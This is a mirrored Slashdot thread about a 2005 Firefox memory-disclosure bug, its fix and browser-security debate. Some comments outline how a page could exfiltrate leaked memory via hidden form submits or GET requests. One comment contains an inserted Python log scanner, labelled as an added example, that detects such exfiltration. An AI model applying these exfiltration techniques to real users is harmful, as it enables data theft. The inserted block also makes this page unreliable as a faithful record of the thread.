Slashdot Mirror


Mozilla / Firefox Memory Exposure Vulnerability

JimmyM writes "Secunia has a story regarding a new severe vulnerability in the Mozilla Suite and Firefox browser, which can be exploited by any web site to read all memory, which the browser process has access to. No patch is available from Mozilla. A demonstration is available here."

132 comments

  1. Did the Mozilla/Firefox guys ignore a warning? by astrashe · · Score: 3, Insightful

    Did the Mozilla/Firefox guys ignore a warning about this, or did this site publish the vulnerability without giving them a chance to patch?

    1. Re:Did the Mozilla/Firefox guys ignore a warning? by rogabean · · Score: 2, Interesting

      Excellent question.

      Just tested out the "proof test" myself. Amazing some of the stuff I still had in memory here ;)

      Followed by the browser shutting itself down after about 20 furious clicks on the link! :P

      --
      "why don't you just slip into something more comfortable...like a coma!"
    2. Re:Did the Mozilla/Firefox guys ignore a warning? by DJayC · · Score: 2, Informative
      According to bugzilla it's fixed on the trunk. The last comment for the bug associated with this vulnerability says:

      Fixed on trunk, AVIARY_1_0_1_20050124_BRANCH, and MOZILLA_1_7_BRANCH.

      Thanks for the report, I hope that's the last bug from 1997 left ;-).

      /be
    3. Re:Did the Mozilla/Firefox guys ignore a warning? by Vaevictis666 · · Score: 5, Informative

      From the bugzilla bug report (copy it, they disallow /. links):

      Opened: 2005-04-01 13:40 PDT
      Last modified: 2005-04-01 22:39 PDT
      Resolution: FIXED

      So yes they did, it was fixed in under 10 hours, and published 3 days later.

    4. Re:Did the Mozilla/Firefox guys ignore a warning? by klui · · Score: 4, Interesting

      Comments seem to indicate that it's a very old bug...

      ------- Additional Comment #6 From Brendan Eich 2005-04-01 17:49 PDT [reply] -------

      BTW, this bug is like 8+ years old. Roger Lawrence fixed half of it in 2000:

      r=norris,waldemar
      Fixes for bugs#23607, 23608, 23610, 23612, 23613. Also, first cut at URI
      encode & decode routines.

      Unfortunately, AFAICT none of the bugs he cites had anything to do with the two
      hunks of that revision:

      @@ -1061,16 +1080,22 @@ find_replen(JSContext *cx, ReplaceData *
      @@ -1138,16 +1163,17 @@ find_replen(JSContext *cx, ReplaceData *

      that half-fixed the original 1997-era bug. /be

    5. Re:Did the Mozilla/Firefox guys ignore a warning? by DJayC · · Score: 1

      I would think that's proof that the Mozilla/Firefox guys did NOT ignore the warning... not proof that they did. I'm assuming you meant that.. it is Monday after all ;-)

    6. Re:Did the Mozilla/Firefox guys ignore a warning? by TFGeditor · · Score: 1

      And we can get the patch where?

      --
      Ignorance is curable, stupid is forever.
    7. Re:Did the Mozilla/Firefox guys ignore a warning? by Anonymous Coward · · Score: 3, Informative

      You can try the 1.0.3 release candidate, in which this bug is fixed, and which is due to be rolled out very soon. See here for download links.

    8. Re:Did the Mozilla/Firefox guys ignore a warning? by Vaevictis666 · · Score: 1

      Whoops. There's no right way about that. I was saying "yes they did" to the second part of the OP:

      "did this site publish the vulnerability without giving them a chance to patch?"

      But that's wrong too. I meant to say that yes they did inform the Moz devs of this before going public.

    9. Re:Did the Mozilla/Firefox guys ignore a warning? by BinLadenMyHero · · Score: 2, Informative

      copy it, they disallow /. links

      Or just drag the link over the tab bar. Over an empty space (or the close button if it's full) to create a new tab, or over an existing tab to load the link there.

    10. Re:Did the Mozilla/Firefox guys ignore a warning? by passthecrackpipe · · Score: 0

      dude, that is very cool -- i did not know it did that

      --
      People who think they know everything are a great annoyance to those of us who do.
    11. Re:Did the Mozilla/Firefox guys ignore a warning? by BinLadenMyHero · · Score: 1

      I forgot to say that you can also select a text and drag it there. Good for those links posted as plain text, or for quick FeelingLucky searches.

  2. What? by Repiv · · Score: 0

    All it does is crash Firefox.

    1. Re:What? by Repiv · · Score: 0

      My bad, it did crash the first few times, but it worked the fifth time.

    2. Re:What? by Dios · · Score: 1

      Same here. I click the link, Firefox crashes. What gives?

    3. Re:What? by RS_ping · · Score: 1

      Since I upgraded to FF 1.02 my Windows keeps crashing.

      Wait, maybe it's not Firefox. Never mind!

      rsmith@pingdata.net

  3. Confusing write-up by Smack · · Score: 3, Interesting

    Can a remote site actually get access to this information, or is it only displayable on the screen?

    1. Re:Confusing write-up by Vaevictis666 · · Score: 1

      It's available to javascript, which is fully capable of doing a browser redirect and sending the mem dump along as GET data.

    2. Re:Confusing write-up by cjsnell · · Score: 5, Informative

      Can a remote site actually get access to this information, or is it only displayable on the screen?

      The data is being displayed within a TEXTAREA box, so it's probably as simple as adding an onClick="javascript:document.form.submit();" (or onMouseOver, etc.) to the document.

      Yes, this is very dangerous.

    3. Re:Confusing write-up by jcuffe · · Score: 1

      Well it would seem that since the demonstration output the information it read into that textbox, it was able to read the information directly from memory. Then again, I'm not an expert, so although I'm quite positive, I can't say for sure.

    4. Re:Confusing write-up by orangesquid · · Score: 2, Informative

      AFAIK, JavaScript could do something with this information, such as load an image that has ?randominfo appended, and this could be extracted from the server logs, or it could fill in a hidden item on a POST form that you're about to submit to be less obvious about it.

      --
      --TheOrangeSquid Is it any wonder things seem so awry? We swim in a sea of confusion and don't have to think to survive
    5. Re:Confusing write-up by Kelerain · · Score: 2, Interesting

      If they can display it in a form like that, they could submit that information in a hidden form window on a site where you typically expect to submit info (a login page for example). Javascript can talk to a website back end as well I think.

      Also from the article:
      "A vulnerability has been discovered in various Mozilla products, which can be exploited by malicious people to gain knowledge of potentially sensitive information."

      So yeah, this is a bit more dangerous than the old load the root folder in an iframe trick.

    6. Re:Confusing write-up by Sentry21 · · Score: 3, Interesting

      Javascript could access this, then send that information to a form via a GET request (URLencoded) to a script via a 1x1 pixel iframe hidden on the page, or even a display: hidden; iframe for that matter.

      I don't think this is necessarily a huge problem - it's a critical bug, but until we see some major code execution or phishing, it probably won't be as big of a deal as it could be.

      The question is, can they find out how big of a memory chunk they can read before they start reading? If so, they could grab god knows how many megs and start uploading it somewhere (somehow - that's too big for a GET query) and just dump it, but if they read too much and try to read what Firefox can't access, it should (emphasis 'should') get killed by Windows instead of failing silently.
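
      The exfiltration channel this comment describes (leaked data pushed out as URL-encoded GET parameters on an image or iframe request) is also something a server-side log review can catch. As an added defender-side example, not code from the thread or from Mozilla, the Python below parses constructed Common Log Format lines and flags requests whose query string is unusually long, mostly percent-encoded, or decodes to non-printable bytes; the log lines, field names and thresholds are all assumptions made for the example.

```python
"""Flag web requests whose query string looks like it carries bulk data.

Added example, not code from the thread or from Mozilla: the posts above
describe pushing leaked memory out of the browser as URL-encoded GET
parameters on an image or iframe request. Server-side, that shows up as a
request with an unusually long or binary-looking query string. The log
lines, field names and thresholds below are all constructed for this example.
"""
import re
from urllib.parse import unquote_to_bytes, urlsplit

# Common Log Format as written by Apache/nginx; group names are our own.
CLF_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Assumed thresholds; tune them against what is normal for the site.
MAX_QUERY_LEN = 512        # longest query string expected from legitimate pages
MAX_ENCODED_RATIO = 0.30   # share of query characters that are %XX escapes
MAX_NONPRINT_RATIO = 0.10  # share of decoded bytes outside printable ASCII

# Constructed sample log: two ordinary requests followed by two that carry
# data in the query string the way the thread describes.
SAMPLE_LOG = "\n".join([
    '203.0.113.7 - - [04/Apr/2005:10:12:01 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '203.0.113.7 - - [04/Apr/2005:10:12:02 +0000] "GET /search?q=firefox+memory HTTP/1.1" 200 2210',
    '203.0.113.7 - - [04/Apr/2005:10:12:03 +0000] "GET /img/pixel.gif'
    '?d=%00%00%00%01%FF%FE%3C%68%74%6D%6C%3E%00%80%81 HTTP/1.1" 200 43',
    '203.0.113.7 - - [04/Apr/2005:10:12:04 +0000] "GET /track?data='
    + "A" * 600 + ' HTTP/1.1" 200 43',
])


def parse_clf(line):
    """Split one CLF line into its fields, or return None if it does not parse."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None


def query_indicators(target):
    """List the reasons a request target's query string looks like a data carrier."""
    query = urlsplit(target).query
    if not query:
        return []
    reasons = []
    if len(query) > MAX_QUERY_LEN:
        reasons.append(f"query length {len(query)} exceeds {MAX_QUERY_LEN}")
    # Each %XX escape occupies three characters of the raw query string.
    escapes = len(re.findall(r'%[0-9A-Fa-f]{2}', query))
    encoded_ratio = escapes * 3 / len(query)
    if encoded_ratio > MAX_ENCODED_RATIO:
        reasons.append(f"percent-encoded share {encoded_ratio:.2f} exceeds {MAX_ENCODED_RATIO}")
    # Decode and look for bytes a normal form field would never contain.
    raw = unquote_to_bytes(query)
    nonprint = sum(1 for b in raw if b < 0x20 or b > 0x7E)
    nonprint_ratio = nonprint / len(raw) if raw else 0.0
    if nonprint_ratio > MAX_NONPRINT_RATIO:
        reasons.append(f"non-printable share {nonprint_ratio:.2f} exceeds {MAX_NONPRINT_RATIO}")
    return reasons


def scan_log(text):
    """Return one finding per request whose query string trips an indicator."""
    findings = []
    for line in text.splitlines():
        rec = parse_clf(line)
        if rec is None:
            continue
        reasons = query_indicators(rec["target"])
        if reasons:
            # Target is truncated for display only; the full value is in the log.
            findings.append({"client": rec["client"], "time": rec["time"],
                             "target": rec["target"][:60], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["client"], f["time"], f["target"], "; ".join(f["reasons"]))
```

      Legitimate analytics beacons and search forms can also produce long query strings, so the length threshold should be baselined per path before the scanner is trusted; the percent-encoded and non-printable checks are the more specific signal, since ordinary form data decodes to readable text.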

  4. I'm shocked! by samael · · Score: 5, Interesting

    I seem to recall that every time an IE bug appeared people would say that Mozilla was much more secure, and that it wasn't just that IE was targeted by hackers because of the popularity, but that the software was inherently more secure.

    But now it seems there are patches for Mozilla every few weeks for _exactly_ the same kind of problems that IE used to get slated for.

    Is Mozilla actually more secure? Or is it just as bad as any other piece of software?

    1. Re:I'm shocked! by orangesquid · · Score: 1

      It's getting used more than it used to---that's a big part of it.

      --
      --TheOrangeSquid Is it any wonder things seem so awry? We swim in a sea of confusion and don't have to think to survive
    2. Re:I'm shocked! by jcuffe · · Score: 1

      Maybe the reason for this is the growing usage of Mozilla applications. One reason often given for the security of open source (and macs) is that more users use Microsoft etc. products, which makes them larger targets. Just my two cents.

    3. Re:I'm shocked! by Anonymous Coward · · Score: 0

      The bug was fixed in under 10 hours. Not bad if you ask me.

    4. Re:I'm shocked! by FidelCatsro · · Score: 2, Informative
      From the looks of it, these problems are not affecting the rest of the OS (as far as I can tell from the explanation on Secunia). I did a few tests and it is only reading the memory area from the browser; how far into the memory it can go I do not know (does it say? The Secunia advisory is shallow on details as usual).
      Well, unlike MSIE this is a bug rather than a feature (ActiveX), and all software has bugs, but apparently it is patched so will be rolled out soon.
      Getting details on this is not the easiest, but according to the bug reports someone was saying the problem was perhaps in the browser for the last 8 years..
      ------ Additional Comment #6 From Brendan Eich 2005-04-01 17:49 PDT [reply] -------

      BTW, this bug is like 8+ years old. Roger Lawrence fixed half of it in 2000:

      r=norris,waldemar
      Fixes for bugs#23607, 23608, 23610, 23612, 23613. Also, first cut at URI
      encode & decode routines.

      Unfortunately, AFAICT none of the bugs he cites had anything to do with the two
      hunks of that revision:

      @@ -1061,16 +1080,22 @@ find_replen(JSContext *cx, ReplaceData *
      @@ -1138,16 +1163,17 @@ find_replen(JSContext *cx, ReplaceData *

      that half-fixed the original 1997-era bug.

      /be
      --
      The only things certain in war are Propaganda and Death. You can never be sure which is which though
    5. Re:I'm shocked! by ChipMonk · · Score: 2

      The possibility of identity theft is nothing to be careless about. However, Mozilla on Unix/Linux still has the advantage over IE on Windows, in that a normal user account is not able to take down the entire system without considerable effort on the part of the attacker. Desktop Windows pre-XP had no problem with anything a user did, up to and including deleting the C:\WINDOWS directory.

      So the original assertion is still, at least partly true: The software underneath the apps is more secure.

    6. Re:I'm shocked! by samael · · Score: 2, Insightful

      Which is fair enough.

      Of course, I can reinstall the OS in about two hours.

      It's my documents I actually care about...

    7. Re:I'm shocked! by curbion · · Score: 1

      How in the hell is that flamebait? I think you have a Troll with mod points after you.. I shall sacrifice my karma (n00b karma, no loss, I can gain it back later) by being offtopic and insulting the mod here. I was reading over the bug report myself and came across the same thing, so if anyone could expand on if this is true and has it been around for 8 years then please do tell us. Bad moderation, really bad. Fidel, welcome to my friend list

      --
      Im a robot your a robot , That however is a row-boat
    8. Re:I'm shocked! by Gary+Destruction · · Score: 1, Insightful

      Mozilla is at version 1.7.5 and Firefox is at version 1.x. IE is approaching version 7.0. Microsoft has billions of dollars and more than enough developers and other personnel to make a secure product. Mozilla may have more security flaws in the short run, but it will have less in the long run because more careful consideration was made during development.

    9. Re:I'm shocked! by NanoGator · · Score: 3, Informative

      "Is Mozilla actually more secure? Or is it just as bad as any other piece of software?"

      It's a commonly held belief that Microsoft programmers come from Elbonia. Once it is accepted that Mozilla programmers are just as Elbonian as MS Programmers, the security zealousy will die down.

      (Disclaimer 1: This post does not say that Mozilla is less secure (or more secure, for that matter) than IE. This post does not say that Mozilla programmers are incompetent. This post does address zealotry and nothing else.)

      (Disclaimer 2: It really fucking pisses me off that I have to write this stupid disclaimer because lots of people with mod-points will not accept anything that's even remotely negative about Mozilla. Learn how to take criticism before dispensing it.)

      --
      "Derp de derp."
    10. Re:I'm shocked! by dougmc · · Score: 1
      in that a normal user account is not able to take down the entire system without considerable effort on the part of the attacker
      To be fair, a good bug in Mozilla can take your X server down, or at least make it so unresponsive that you can't do anything. Or it could kill your window manager, probably logging you out. And if things do get really stuck, you may have to log in from another system (or hit the vulcan nerve pinch keys -- either kill X, get to a VC and maybe C-A-D.)

      Not quite as bad as taking the entire system down, but still annoying when it happens.

    11. Re:I'm shocked! by samael · · Score: 1

      Mozilla is based on code going back a very long time.

      And if it's younger then it's had less time to have horrible crustiness develop.

      Either way round isn't an excuse.

    12. Re:I'm shocked! by dougmc · · Score: 2, Insightful
      Mozilla is at version 1.7.5 and Firefox is at version 1.x. IE is approaching version 7.0.
      And Linux is at version 2.6.something, and Windows is at version 2003 and Solaris is at version 10 (having jumped from 2.6 to 7.) Fedora Core is at FC3 (or is that RH12?) Doom is up to Doom 3, and Jake 2.0 was released at 2.0 and never made 2.1. And I think Sid died at version 6.7. Relevance?

      Version numbers don't mean anything. They're arbitrary, and you cannot compare them to the numbers of other products like you appear to be doing, at least not in any meaningful way.

    13. Re:I'm shocked! by samael · · Score: 1

      I sincerely agree with disclaimer 2 - I _wasn't_ saying Mozilla was worse, or as bad. I was merely pointing out the disjunction between what I'd been told and what I was seeing and asking whether I was seeing things...

    14. Re:I'm shocked! by Gary+Destruction · · Score: 1

      Who has more developers and resources: Mozilla or Microsoft?

    15. Re:I'm shocked! by samael · · Score: 1

      Aaaah, so you're saying that Microsoft is always going to produce software then?

    16. Re:I'm shocked! by Gary+Destruction · · Score: 1

      Are you implying that version numbers are qualitative?

    17. Re:I'm shocked! by Anonymous Coward · · Score: 1, Insightful
      Are you implying that version numbers are qualitative?

      No, he was mocking someone else who did:

      Mozilla is at version 1.7.5 and Firefox is at version 1.x. IE is approaching version 7.0.

    18. Re:I'm shocked! by HardJeans · · Score: 0

      It also appears every IE security flaw/exploit is frontpage /. news. So why isn't this a frontpage story?

      --
      "I'm not talking to myself, I'm just the only one who's listening." - Jimmies Chicken Shack
    19. Re:I'm shocked! by civilizedINTENSITY · · Score: 1

      You can reinstall the OS in about two hours, sure. If you know you've been owned. So, then, do you reinstall every day? Every 12 hours? If you care about your documents, does it matter being owned? I think so.

    20. Re:I'm shocked! by Ogerman · · Score: 4, Interesting

      Is Mozilla actually more secure? Or is it just as bad as any other piece of software?

      In terms of design decisions, you might easily say that Mozilla is more secure than IE. (not being integrated with OS and all..) In terms of coding bugs, Mozilla is no different than any other super complex piece of software. But there's another way to look at it. Because the Mozilla code is open, we might expect an ugly rash of bugs to be found near the beginning of its rise to popularity. But we might also expect this to rapidly taper off as all the major bugs are found and squashed. So you might say that now is a relatively dangerous time to use Mozilla (instead of say.. Konqueror or Safari). But, on the other hand, it's still not quite popular enough to attract the volume of real-world attacks that IE has received. Honestly, if you're some jerk running a malicious website, are you going to target this quirky bug in Mozilla or the myriad of IE exploits that are sure to pay off?

      What does bother me is that the Mozilla folks haven't taken automated updates seriously enough. I cringe to think of how many Firefox early adopters have no clue what that little red arrow at the top of their screen is. Or if they do, how many dial-up users will be patient enough to wait for the update to download.. which isn't really an update at all but a full copy of the latest version.

    21. Re:I'm shocked! by orasio · · Score: 1

      Two hours doing something you didn't want to do is a lot of time.
      Two hours when you have a deadline is a lot of money.
      Two hours in the workplace would not be acceptable.

      Plus, you would need to know your system has been compromised in the first place, and then reinstall the same unsecure software.

      With mozilla, you could wait 8 more hours, and install a patched version of your software.

    22. Re:I'm shocked! by orasio · · Score: 1

      IE bugs are a real problem because you can't hide from it.
      If mozilla has some critical bug, you can always disable mozilla and use konqueror until mozilla releases a fix. That would be a day or two without mozilla.
      In an IE-scenario, you would not be able to disable IE, plus there's no reasonable amount of time after which you can expect a bug will be fixed.
      No one is talking about bug-free software. Bug-free software is just not worth it, it would take too much time and money to be useful.

      The thing with IE is that most people can't trust Microsoft to fix IE issues fast enough.

      Security issues, although all of them can be critical, cannot be measured just as "amount of critical issues made public". If you factor in at least the severity of the issue * time for a patch, the numbers are very different between mozilla* and IE.

      Maybe they are promising a more secure IE in the future, but there's just no need for it. It's difficult to regain trust in something that has failed your objectives so miserably in the past.

    23. Re:I'm shocked! by orasio · · Score: 1

      MS programmers come from who-knows-where, and no one can see their code to see if it's good.
      MS feature list comes from marketing dept. Its release deadlines, from marketing dept + the reality. If reality-based delays don't meet marketing expectations, we don't know what they do.

      Mozilla developers can be put to test, because we can read their code; there are even people who do read their code. If you got any conclusions on the mozilla developers' skill, you couldn't extrapolate them to MS developers, because you can't see their code.
      Mozilla feature list comes from user feedback + whatever the maintainers feel is sensible to add.
      Their release schedule is firmly based on reality, coders and maintainers. They release when it's ready, basically. The way they use to meet a self-imposed deadline is basically to keep new features out.

      They are very different pieces of software, and we could measure the quality of mozilla software, but we cannot do the same with IE, other than on the surface. We could measure the quality of the mozilla development process, and we can't do the same with IE.

      What I believe is that it can be argued if mozilla is good software or not, and to an extent, setting some framework, it can be proved. The same can't be done about MS software.

      So, what I mean is that there can be other reasons than just personal like or dislike to talk about quality between MS software. Just because microsoft software quality is unknown it doesn't mean that it is equal to mozilla software quality. At least mozilla software quality is measurable, that alone _does_ make it better.

    24. Re:I'm shocked! by NanoGator · · Score: 1

      "MS programmers come from who-knows-where,"

      And Open Source programmers come from the good programmers cabbage patch or something?

      " there is even people who do read their code."

      If they feel like it. Sadly, errors and half-assed functionality still get through.

      "Mozilla feature list comes from user feedback + whatever the maintainers feel is sensible to add."

      Whatever they feel like adding. (Or, more appropriately, copying from another app.)

      "So, what I mean is that there can be other reasons than just personal like or dislike to talk about quality between MS software."

      Maybe. However, Mozilla (nor Open Source, really) is perfect, and shit still happens. It doesn't matter if you're using something made by Microsoft or by the community, there are downsides to it. Frankly, since I'm so sick of both extremes of it, I've settled on Opera. They're for profit. That means they get problems fixed. That also means they stay innovative to compete. I have a better browsing experience as a result of it.

      --
      "Derp de derp."
    25. Re:I'm shocked! by orasio · · Score: 1

      Opera suxx : )

      I believe you are not quoting right.
      The OP stated that there is some amount of error inherent to software development, and that MS developers were supposed to be assumed to have the same quality as mozilla developers.

      What I meant is that mozilla developers produce code of a much more measurable (for the general public) quality, and that fact for itself is important.

      What I exactly meant is that it does matter what you are using, because you can make a more informed decision about whether you use or not mozilla, and it has a record way better than IE, by any sensible measure.

      What you say about a company being for profit, and the fact that they should fix issues faster goes against the fact that vulnerability fixes are available faster for software developed by free charge software.

    26. Re:I'm shocked! by NanoGator · · Score: 1

      "Opera suxx : )"

      Actually, from the end-user point of view, Opera's probably the best one out there. Depends on how you view it, though. :)

      "What I meant is that mozilla developers produce code of a much more measurable (for the general public) quality, and that fact for itself is important."

      I'm not sure I agree with that, but I don't think I can strongly dispute it either. Frankly, I'm not impressed with OSS software. I mean, some of it I am. A lot of it, I'm not. My idea of quality is that features work. I'll give you an example: A few months ago my gf reformatted her computer. She installed FireFox. (or was it Mozilla? I can't remember.) She absent-mindedly tried to import her IE bookmarks. (Absent-minded because it was a fresh install. No bookmarks to import.) FireFox crashed. It crashed every single time she tried it until she created a bookmark from IE. Quality, to me, says they would have written that feature with the idea that it could be run without the required data. Error checking.

      I have no doubt that in general OSS software has better development practices, but they really fall flat on their face when the programmers overlook UI features.

      Again, I think we're measuring two different sides of the equation, so please don't feel like I'm trying to poo-poo your point into the ground.

      "What you say about a company being for profit, and the fact that they should fix issues faster goeas against the fact that vulnerability fixes are available faster for software developed by free charge software."

      Perhaps. In some cases that is true, in some cases it isn't. It depends on how critical the problem is. There are a lot of problems with FireFox/Mozilla, for example, that have been problems for years. Microsoft's not immune to this, but it really does depend on what the programmer is interested in working on.

      As far as innovation goes, OSS has a lousy habit of being a cheap carbon copy of whatever it is they're imitating. (GIMP, uck.) For once, I'd like to see OSS develop in an innovative way.

      --
      "Derp de derp."
    27. Re:I'm shocked! by orasio · · Score: 1

      Ok, again.
      Opera, I used to like.
      Now I don't use windows anymore, and I choose not to use non-free software, for ethical rather than technical reasons. That doesn't mean I don't care about features. I even run some non-free software when I just need to, to get my work done.

      What happens to me with Opera is that it was great, tabs were really great. Now Firefox is just smoother to me. I am a usability freak, too. It just happens that Firefox doesn't have usability issues that interfere with _my_ habits. I like, for example, its handling of dialogs, explanation of actions and defaults.

      When you talk about innovation... well, what innovation are you talking about? lots of free software (not just OSS software) is way ahead of what is available in proprietary software.
      Of course, mainstream free software or OSS is just... mainstream. The most popular pieces of OSS are the replacements to what proprietary software makes.
      As a counter-example, you have cinepaint, developed from gaim, that implements lots of useful stuff for movie making. There, gaim started as a copy (I never learned effective photoshop, but I can use gaim) of photoshop, and it helped develop something that wasn't available to the general public.

      Another big example of free software innovation, is archy, a different way to do things, that was originally proposed in a book by Jef Raskin, and is developed in the open, without the support of any big software company, at least until now. I believe it doesn't get more innovative than this (http://www.raskincenter.org/index2.html#whatisarchy).

    28. Re:I'm shocked! by Gary+Destruction · · Score: 1

      So what are you saying? They're quantitive? If that's true, then his argument has no basis.

    29. Re:I'm shocked! by Gary+Destruction · · Score: 1

      I didn't think that they were qualitative. I thought that they were quantitive. You do know what those two words mean, don't you? Obviously the person that modded you up is a fucking moron just like you. You don't even have the fucking balls to post a name you fucking pussy.

    30. Re:I'm shocked! by Gary+Destruction · · Score: 1

      Here's the definition of qualitative http://dictionary.reference.com/search?q=qualitative

      Here's the definition of quantitive http://dictionary.reference.com/search?q=quantitive
      I hope this doesn't exceed your fourth grade reading level.

    31. Re:I'm shocked! by NanoGator · · Score: 1

      "It just happens that Firefox doesn't have usability issues that interfere with _my_ habits. I like, for example, its handling of dialogs, explanation of actions and defaults."

      To each his own. Me personally, I enjoy all the little things they did to make browsing easier. Magnifying glass, 'paste and go' in the address bar, the notes panel, the mail client that is brilliant for handling forum email, etc. Whenever I use FireFox, I end up looking for buttons that aren't there.

      "When you talk about innovation... well, what innovation are you talking about? lots of free software (not just OSS software) is way ahead of what is available in proprietary software."

      I have a feeling we'll never totally agree on this just on the grounds of different experience. FireFox comes to mind, it has a lot of features that popped up well after Opera produced them. The GIMP further comes to mind, it's quite painful to use if you're a Photoshop user. Linux is quite the technological triumph, but the UI always feels a generation or two behind Windows. Thunderbird's not bad, but it's not Outlook either. (Granted, I don't think Outlook was its goal so maybe that isn't fair. I have to say, though, I tossed it after getting tired of finding bugs.) (Note: I'm talking about Outlook 2000, not Outlook Express. It's like comparing Word to Wordpad.)

      Again, I'm not sure we'll agree, so please don't feel too defensive. My experiences with OSS have almost always made me feel it is perpetually behind its proprietary counterparts. If you have a different experience, I can't really argue with it, nor would I try to.

      Cheers.

      --
      "Derp de derp."
    32. Re:I'm shocked! by Anonymous Coward · · Score: 0

      "Who has more developers and resources: Mozilla or Microsoft?"

      Er, I thought the strength of open source was loads of eyeballs on the code? Ooops, eh?

      You can't fudge your way out of it: Firefox has security problems, just like IE, and there's a lot of messy and half-assed code in there. I love it, but to blindly assume it's better code all-round is just crazy.

  5. oh man by Anonymous Coward · · Score: 2, Funny

    all those l33t hackers will be able to see all my pr0n!

  6. Interesting by L.+VeGas · · Score: 1

    Crashed firefox when I tried it.

    1. Re:Interesting by Matthew+Bafford · · Score: 1

      Same with my version (1.0.2).

    2. Re:Interesting by Matthew+Bafford · · Score: 1

      Didn't crash the second time (with a fairly new session).

    3. Re:Interesting by Kelerain · · Score: 1

      It's grabbing random memory garbage, right? So it stands to reason that some certain pattern or amount of memory displayed is causing a crash bug. Perhaps there is some html in there that is confusing the engine, or some other random garbage string. I didn't hit a crash myself in a few clicks, but it would also depend on what sorts of things you have been doing.

    4. Re:Interesting by fgl · · Score: 1

      That's the auto defense system that was secretly installed in Firefox. Where the idea was stolen from we will leave as an exercise for the reader.

      --
      Go Away! Not for Sale
  7. They say that open source... by Anonymous Coward · · Score: 1, Insightful

    ...is faster at fixing serious security flaws than closed source. Now this here is a fairly nasty vulnerability; not as bad as remote code execution, certainly, but still something I'd want fixed on my mum's PC as quickly as possible. So I'm wondering, just how long will the Mozilla foundation take to distribute a fix for this vulnerability - not just patch it in the nightlies, as that is trivial - but include it in an automatic update, like Microsoft would? I'm betting on weeks or months (not flame-baiting here, but so far most Firefox fixes have trickled down very slowly.) It will be interesting to watch and see.

    1. Re:They say that open source... by n1ywb · · Score: 1

      I'm guessing you'll see a patch within 24 hours. *Fingers crossed*

      --
      -73, de n1ywb
      www.n1ywb.com
    2. Re:They say that open source... by DJayC · · Score: 1

      Just get a nightly if you don't want to wait. It's fixed on the trunk since April 1st.

      Here's a link

    3. Re:They say that open source... by ssj_195 · · Score: 1

      I'm hoping so. Despite the slightly challenging tone of my post, I'm genuinely rooting for them, but so far I can think of only one automatic update that wasn't one of the minor point releases (can't think of the exact term; you know, 1.0.0, 1.0.1, 1.0.2), and these have been spread far apart indeed :(

    4. Re:They say that open source... by node+3 · · Score: 1

      is faster at fixing serious security flaws than closed source

      Considering this whole is already fixed, it's hard to ask for faster than that!

      On the other hand...

      So I'm wondering, just how long will the Mozilla foundation take to distribute a fix for this

      That's another question altogether, and one that isn't done so well with Firefox. Still far better than with IE (where you see actively exploited vulnerabilities listed on MS's IE page that aren't fixed for months!). This is something the Mozilla folks need to work on, but being a major open source project, it's more likely to be worked out than closed source projects are (which is the subject of your post).

    5. Re:They say that open source... by fluffy99 · · Score: 1

      Great! I just installed the nightly build and it killed all of my extensions. I want my adblock back and flash blocker back (whimper). The extensions dialog box also locks up.

    6. Re:They say that open source... by fluffy99 · · Score: 1

      Ok, I'm back. I reinstalled 1.0.2 and Firefox would start but none of the menus worked. I had to delete my profile directory, let Firefox recreate it, and copy my cookies and bookmarks files back in. Had to reinstall all the extensions too.

      Gotta love that open source software stability! You can bet I won't be trying any nightly builds anytime soon.

    7. Re:They say that open source... by Narchie+Troll · · Score: 1

      Well, yes. Nightlies are unstable. That's the very nature of them.

      It has nothing to do with open source or any other methodology -- nightly builds are expected to break things.

    8. Re:They say that open source... by fluffy99 · · Score: 1

      I expect some problems with a developmental build. I was surprised by the fact that it barely worked, took forever to come up, and ate 60-meg of ram when it finally did. Even worse, I practically had to castrate the program to be able to backtrack to the stable version. I'm just hoping the developers fix all these problems before rolling up the changes and calling it stable.

      I still prefer Firefox as I think it's safer than IE. Not completely safe, though. I certainly don't feel it's stable given all the problems I've had with the regular releases (for example Flash on pages crashing the browser, weird crashes, etc). Never mind the crap they called a nightly build. I'm still up in the air on security too.

    9. Re:They say that open source... by Narchie+Troll · · Score: 1

      Nightly builds are automated. They're not even guaranteed to work. A daily snapshot of a constantly developing project may very well catch a transitional stage where everything's fucked up.

  8. It looks like it requires Javascript by wowbagger · · Score: 2, Interesting

    It looks like, in order to make use of this flaw, the attacker must get the victim to run Javascript.

    Once again demonstrating the danger in the current mindset of "I will use Javascript to do everything, even things that can be done with plain HTML like opening a new window".

    I have my Mozilla configured to ask me if I want it to fetch Javascript from remote sites (alas, you cannot protect yourself from Javascript embedded in the HTML of the site you are visiting), to ask me if I want to run any requested plugins, and to ask me before allowing any cookies to be set on my browser.

    If you can, try this yourself - you will be AMAZED at the number of sites that insist upon setting a cookie on you the first thing when you visit them, or that insist upon trying to load Javascript, or Flash plugins.

    Cookies are fine for sites which require log-in (e.g. /.). Javascript is fine for sites that need to do some client side processing (e.g. order entry sites which use JS to compute the order amounts to avoid a round-trip to the server). Flash is fine for some applications.

    But please don't over use them.

    1. Re:It looks like it requires Javascript by ChipMonk · · Score: 2, Informative

      Only if JavaScript is completely disabled, will this attack fail. JavaScript in the [HEAD] block executes as soon as the page loads. If this code is buried in that block, it will execute without any further intervention from the user.

    2. Re:It looks like it requires Javascript by Dachannien · · Score: 1

      Flash is fine for some applications.

      I have yet to see a web application in Flash that couldn't be implemented in plain HTML with maybe a touch of server-side scripting. So-called Flash "movies" don't count, because those could simply be saved to disk via web browser without involving a plugin, and then could be played back without any online component at all.

      Of greatest annoyance are websites with Flash intros lacking a way to get past the intro, or with Flash navigation instead of a simple imagemap. Not everything on the web has to beep, spin, blink, or interact with the user - in fact, it's best if nothing does.

    3. Re:It looks like it requires Javascript by FireFury03 · · Score: 1

      I will use Javascript to do everything, even things that can be done with plain HTML like opening a new window

      Opening a new window has been deprecated in XHTML - the only way to do it is JavaShit. Which is good because I hate webmasters assuming I want links opened in a new window (I almost never do - if I did I would've clicked "open in new window"). Unfortunately it's bad coz they'll just use Javascript instead. :(

  9. Vuln details by Anonymous Coward · · Score: 0

    https://bugzilla.mozilla.org/show_bug.cgi?id=288688

    Apparently this was a bug reported on previously and patched 4/1/05. Not sure it was really very generous of Secunia to release an exploit so soon.
